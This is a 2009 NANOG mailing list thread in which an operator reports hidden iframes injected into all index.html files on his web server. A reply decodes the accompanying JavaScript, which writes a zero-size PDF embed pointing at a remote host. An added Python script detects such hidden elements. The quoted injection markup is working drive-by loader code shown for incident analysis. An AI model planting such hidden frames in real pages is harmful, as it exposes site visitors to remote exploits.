nanog mailing list archives
Re: Malicious code just found on web server
From: Chris Mills <securinate () gmail com>
Date: Fri, 17 Apr 2009 18:06:41 -0400
I took a quick look at the code... formatted it in a pastebin here: http://pastebin.com/m7b50be54

That javascript writes this to the page (URL obscured):

document.write("<embed src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|Unknown|US|1.2.3.4\" width=\"0\" height=\"0\" type=\"application/pdf\"></embed>");

The 1.2.3.4 in the URL is my public IP address (I changed that).

Below the javascript, it grabs a PDF:

<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>

That PDF is on the site, I haven't looked at it yet though.

-ChrisAM http://securabit.com

On Fri, Apr 17, 2009 at 4:42 PM, Russell Berg <berg () wins net> wrote:
FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

-----Original Message-----
From: Russell Berg
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog () nanog org'
Subject: Malicious code just found on web server

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:

src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe>
<iframe src="http://77.92.158.122/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe>
</body>
</html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this. Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
berg () wins net
715-832-3726
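
The markup quoted in this thread (an iframe with display: none and zero dimensions, and a 1x0 embed) can be found mechanically when checking the other pages on a server. The following is an added example, not code from any message in the thread; the function and class names, the site host and the sample page are constructed, and 192.0.2.10 is a documentation address standing in for the remote host.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the markup quoted in the thread.
SAMPLE = """<html><body>
<p>Welcome</p>
<iframe src="/local/menu.html" width="200" height="400"></iframe>
<iframe src="http://192.0.2.10/webmail/inc/web/index.php" style="display: none;" height="0" width="0"></iframe>
<embed src="include/two.pdf" width="1" height="0" style="border:none"></embed>
</body></html>"""


class HiddenFrameFinder(HTMLParser):
    """Collect iframe/embed/object tags that a visitor cannot see."""
    TAGS = {"iframe", "embed", "object"}

    def __init__(self, site_host=""):
        super().__init__()
        self.site_host = site_host  # the server's own hostname (assumption)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.TAGS:
            return
        a = {k: (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        # A width or height of 0 or 1 (with or without "px") is effectively invisible.
        tiny = any(a.get(d, "").strip().rstrip("px") in ("0", "1")
                   for d in ("width", "height"))
        hidden = "display:none" in style or "visibility:hidden" in style
        if not (tiny or hidden):
            return
        src = a.get("src") or a.get("data", "")  # <object> uses data=
        host = urlparse(src).hostname or ""
        external = bool(host) and host != self.site_host
        line, _ = self.getpos()
        self.findings.append(
            {"line": line, "tag": tag, "src": src, "external": external})


def scan_html(text, site_host=""):
    """Return one finding per hidden iframe/embed/object in the HTML text."""
    finder = HiddenFrameFinder(site_host)
    finder.feed(text)
    return finder.findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE, site_host="www.example.net"):
        print(finding)
```

Run over every index.html under the document root, a finding with external set to True is the case reported here; hidden elements with a relative src, like the PDF embed, still merit a look at the referenced file.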